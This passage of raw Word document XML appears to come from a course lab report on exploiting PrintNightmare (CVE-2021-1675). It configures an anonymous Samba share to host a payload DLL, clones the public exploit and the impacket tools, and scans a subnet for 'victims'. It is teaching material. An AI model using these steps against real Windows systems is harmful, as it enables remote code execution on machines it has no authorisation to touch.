      <w:r w:rsidR="000D1A73">
        <w:t>srv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000D1A73">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000D1A73">
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="707AE5B9" w14:textId="77777777" w:rsidR="000A6F34" w:rsidRPr="00C77073" w:rsidRDefault="00E96B85" w:rsidP="000A6F34">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB6621">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65A8157D" wp14:editId="3CF6C9C9">
            <wp:extent cx="3064933" cy="1821106"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="881305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544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2756" cy="18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0A6F34">
        <w:br/>
      </w:r>
      <w:r w:rsidR="000A6F34" w:rsidRPr="00C77073">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>[global]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3A6E31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map to guest = Bad User</w:t>
      </w:r>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Failed logins become guest access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8AA8DA" w14:textId="077B24AB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server role = standalone server</w:t>
      </w:r>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Not part of a domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417C9E0B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C77073">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>usershare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow guests = yes</w:t>
      </w:r>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Guest access allowed for user-created shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C7E6BB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C77073">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>idmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> config * : backend = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>tdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Local ID mapping database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EB92DC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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> ports = 445</w:t>
      </w:r>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> → SMB over TCP only (no NetBIOS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6DF695" w14:textId="77777777" w:rsidR="000A6F34" w:rsidRPr="00C77073" w:rsidRDefault="000A6F34" w:rsidP="005D510A">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1899AB37" w14:textId="0D9E8DF4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path = /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>srv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidR="00226A8B" w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>hared</w:t>
      </w:r>
      <w:r w:rsidR="00226A8B" w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder location of the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4A24D6" w14:textId="0DFB573A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guest ok = yes</w:t>
      </w:r>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidR="007D3A67" w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Allow a</w:t>
      </w:r>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>nonymous access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697406FF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read only = yes</w:t>
      </w:r>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> → No file modifications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233D5C00" w14:textId="18D9BF66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browsable = yes</w:t>
      </w:r>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidR="00917F67" w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Make it a v</w:t>
      </w:r>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>isible network share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FF2D0B" w14:textId="77777777" w:rsidR="000A6F34" w:rsidRPr="00C77073" w:rsidRDefault="000A6F34" w:rsidP="000A6F34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>force user = nobody</w:t>
      </w:r>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> → All access runs as the nobody user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D38ED3" w14:textId="77777777" w:rsidR="000A6F34" w:rsidRDefault="000A6F34" w:rsidP="000A6F34">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6F34">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is the nobody account in Linux?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3942DDD6" w14:textId="70FA1A65" w:rsidR="000A6F34" w:rsidRPr="000A6F34" w:rsidRDefault="000A6F34" w:rsidP="000A6F34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6F34">
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="000A6F34">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>built-in, non-privileged system account</w:t>
      </w:r>
      <w:r w:rsidRPr="000A6F34">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55451CD4" w14:textId="77777777" w:rsidR="000A6F34" w:rsidRPr="000A6F34" w:rsidRDefault="000A6F34" w:rsidP="000A6F34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6F34">
        <w:t xml:space="preserve">Used for services that must run with </w:t>
      </w:r>
      <w:r w:rsidRPr="000A6F34">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>minimal permissions</w:t>
      </w:r>
      <w:r w:rsidRPr="000A6F34">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576FD2CC" w14:textId="77777777" w:rsidR="000A6F34" w:rsidRPr="000A6F34" w:rsidRDefault="000A6F34" w:rsidP="000A6F34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6F34">
        <w:t>Cannot own important system files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F6B785" w14:textId="77777777" w:rsidR="000A6F34" w:rsidRDefault="000A6F34" w:rsidP="000A6F34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6F34">
        <w:t xml:space="preserve">Ideal for </w:t>
      </w:r>
      <w:r w:rsidRPr="000A6F34">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>anonymous or restricted access</w:t>
      </w:r>
      <w:r w:rsidRPr="000A6F34">
        <w:t>, because it limits damage if misused.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7790FCE6" w14:textId="77777777" w:rsidR="002B7DE1" w:rsidRPr="000A6F34" w:rsidRDefault="002B7DE1" w:rsidP="002B7DE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73582389" w14:textId="25069AF0" w:rsidR="00932B12" w:rsidRDefault="00932B12" w:rsidP="000A6F34">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Start samba service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BD3B46" w14:textId="77CD7D03" w:rsidR="007F2A89" w:rsidRDefault="007F2A89" w:rsidP="007F2A89">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="007F2A89">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2141DC12" wp14:editId="521434F2">
            <wp:extent cx="3633537" cy="395103"/>
            <wp:effectExtent l="0" t="0" r="5080" b="5080"/>
            <wp:docPr id="888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6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302" cy="3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68C" w14:textId="22C2108B" w:rsidR="00C77073" w:rsidRDefault="00C77073" w:rsidP="007F2A89">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C77073">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>smbd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5A98C95B" w14:textId="77777777" w:rsidR="000D0D2E" w:rsidRDefault="000D0D2E" w:rsidP="007F2A89">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2872C0C6" w14:textId="74273A81" w:rsidR="00DF5497" w:rsidRDefault="00434436" w:rsidP="005D3DF3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc214502067"/>
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
      <w:r w:rsidR="000F0107">
        <w:t xml:space="preserve"> Preparation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="555A39B4" w14:textId="79A37835" w:rsidR="00DF5497" w:rsidRDefault="003D2959" w:rsidP="00DF5497">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create 3020lab directory and clone the GitHub PrintNightmare repository  </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="00AB6923">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>cube0x0</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AB6923">
        <w:t>/</w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00150AF4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>CVE-2021-1675</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00DF5497" w:rsidRPr="00150AF4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
      <w:r w:rsidR="00743FBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00DF5497" w:rsidRPr="00150AF4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051777BC" w14:textId="71C9C0F5" w:rsidR="005A1953" w:rsidRPr="005A1953" w:rsidRDefault="005A1953" w:rsidP="00DF5497">
      <w:r>
        <w:t>Create 3020lab directory and clone cube0x0 GitHub repository (CVE-2021-1675)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01649D10" w14:textId="77777777" w:rsidR="00DF5497" w:rsidRPr="00C204C0" w:rsidRDefault="00DF5497" w:rsidP="00DF5497">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C204C0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C204C0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3020lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEF3DB0" w14:textId="6BE14BA9" w:rsidR="009823E5" w:rsidRPr="00C204C0" w:rsidRDefault="00DF5497" w:rsidP="009823E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C204C0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cd 3020lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4A2097" w14:textId="387A5D4A" w:rsidR="00250D62" w:rsidRPr="00C204C0" w:rsidRDefault="00DF5497" w:rsidP="005A1953">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C204C0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="00C204C0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>https://github.com/cube0x0/CVE-2021-1675</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4BB8317F" w14:textId="54E9AD79" w:rsidR="005A1953" w:rsidRPr="005A1953" w:rsidRDefault="005A1953" w:rsidP="005A1953">
      <w:r>
        <w:t xml:space="preserve">Clone </w:t>
      </w:r>
      <w:r w:rsidR="00966FAC">
        <w:t xml:space="preserve">and install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00774A5A">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>mpacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> from cube0x0 GitHub rep</w:t>
      </w:r>
      <w:r w:rsidR="00746E35">
        <w:t>ository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2561215F" w14:textId="2D258AAB" w:rsidR="009823E5" w:rsidRPr="00C204C0" w:rsidRDefault="009823E5" w:rsidP="009823E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C204C0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git clone https://github.com/cube0x0/impacket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3814F2" w14:textId="532D1275" w:rsidR="009018E7" w:rsidRPr="00C204C0" w:rsidRDefault="009018E7" w:rsidP="00DF5497">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C204C0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">cd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C204C0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="78C543F2" w14:textId="35C7D7D3" w:rsidR="00824A03" w:rsidRDefault="00895FA4" w:rsidP="00824A03">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C204C0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009018E7" w:rsidRPr="00C204C0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>python .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009018E7" w:rsidRPr="00C204C0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/setup.py install</w:t>
      </w:r>
      <w:r w:rsidR="00C204C0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C204C0" w:rsidRPr="00C204C0">
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>-------</w:t>
      </w:r>
      <w:r w:rsidR="00C204C0" w:rsidRPr="00C204C0">
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00C204C0" w:rsidRPr="00C204C0">
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; not python3????</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C14B61C" w14:textId="1AD7AC22" w:rsidR="002E6B60" w:rsidRDefault="00F5707D" w:rsidP="002E6B6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773E7D" wp14:editId="3E86E24F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>276659</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>175628</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4222750" cy="2875280"/>
                <wp:effectExtent l="0" t="0" r="6350" b="1270"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="135475899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750" cy="2875280"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4868545" cy="3350465"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="715412296" name="Picture 1" descr="A computer screen shot of whit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10" cy="1765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7907450" name="Picture 1" descr="A computer screen shot of a pro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84555"/>
                            <a:ext cx="4868545" cy="1565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17713" id="Group 3" o:spid="_x0000_s1026" style="position:absolute;margin-left:21.8pt;margin-top:13.85pt;width:332.5pt;height:226.4pt;z-index:251659264;mso-width-relative:margin;mso-height-relative:margin" coordsize="48685,33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">
                <v:shape id="Picture 1" o:spid="_x0000_s1027" type="#_x0000_t75" alt="A computer screen shot of white text&#10;&#10;AI-generated content may be incorrect." style="position:absolute;width:48679;height:1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">
                  <v:imagedata r:id="rId25" o:title="A computer screen shot of white text&#10;&#10;AI-generated content may be incorrect"/>
                </v:shape>
                <v:shape id="Picture 1" o:spid="_x0000_s1028" type="#_x0000_t75" alt="A computer screen shot of a program&#10;&#10;AI-generated content may be incorrect." style="position:absolute;top:17845;width:48685;height:15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">
                  <v:imagedata r:id="rId26" o:title="A computer screen shot of a program&#10;&#10;AI-generated content may be incorrect"/>
                </v:shape>
                <w10:wrap type="square"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D305472" w14:textId="058AC4AF" w:rsidR="002E6B60" w:rsidRDefault="002E6B60" w:rsidP="002E6B60"/>
    <w:p w14:paraId="22BAA5EA" w14:textId="77777777" w:rsidR="00824A03" w:rsidRDefault="00824A03" w:rsidP="00824A03"/>
    <w:p w14:paraId="3EF3BBF3" w14:textId="77777777" w:rsidR="00824A03" w:rsidRDefault="00824A03" w:rsidP="00824A03"/>
    <w:p w14:paraId="30B80958" w14:textId="77777777" w:rsidR="00824A03" w:rsidRDefault="00824A03" w:rsidP="00824A03"/>
    <w:p w14:paraId="2818217E" w14:textId="77777777" w:rsidR="00824A03" w:rsidRDefault="00824A03" w:rsidP="00824A03"/>
    <w:p w14:paraId="4D6117CF" w14:textId="689076EB" w:rsidR="00CC0D90" w:rsidRDefault="00E96B85" w:rsidP="00DF5497">
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A144F79" w14:textId="4939FEF8" w:rsidR="00824A03" w:rsidRDefault="00824A03" w:rsidP="00702FA3"/>
    <w:p w14:paraId="15E87152" w14:textId="03921DED" w:rsidR="00824A03" w:rsidRDefault="00824A03" w:rsidP="00702FA3"/>
    <w:p w14:paraId="6B72C5CE" w14:textId="56628A9E" w:rsidR="005212B9" w:rsidRDefault="005212B9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc214502068"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Victim </w:t>
      </w:r>
      <w:r w:rsidR="007B7ECD">
        <w:t>Reconnaissance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="1D349A6A" w14:textId="2EA467FC" w:rsidR="000C6856" w:rsidRDefault="004C1EA5" w:rsidP="004C1EA5">
      <w:r>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to scan for potential victims</w:t>
      </w:r>
      <w:r w:rsidR="00EC7059">
        <w:t xml:space="preserve"> on the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445E2338" w14:textId="5AEBEBA8" w:rsidR="004C1EA5" w:rsidRDefault="000611C7" w:rsidP="004C1EA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A5F2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00EC7059" w:rsidRPr="007A5F2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A5F2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A5F2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A5F2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> 172.16.0/24</w:t>
      </w:r>
      <w:r w:rsidR="004C1EA5">
        <w:br/>
      </w:r>
      <w:r w:rsidR="006F02D7" w:rsidRPr="006937ED">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5161E17C" wp14:editId="244A2477">
            <wp:extent cx="3892757" cy="3144982"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
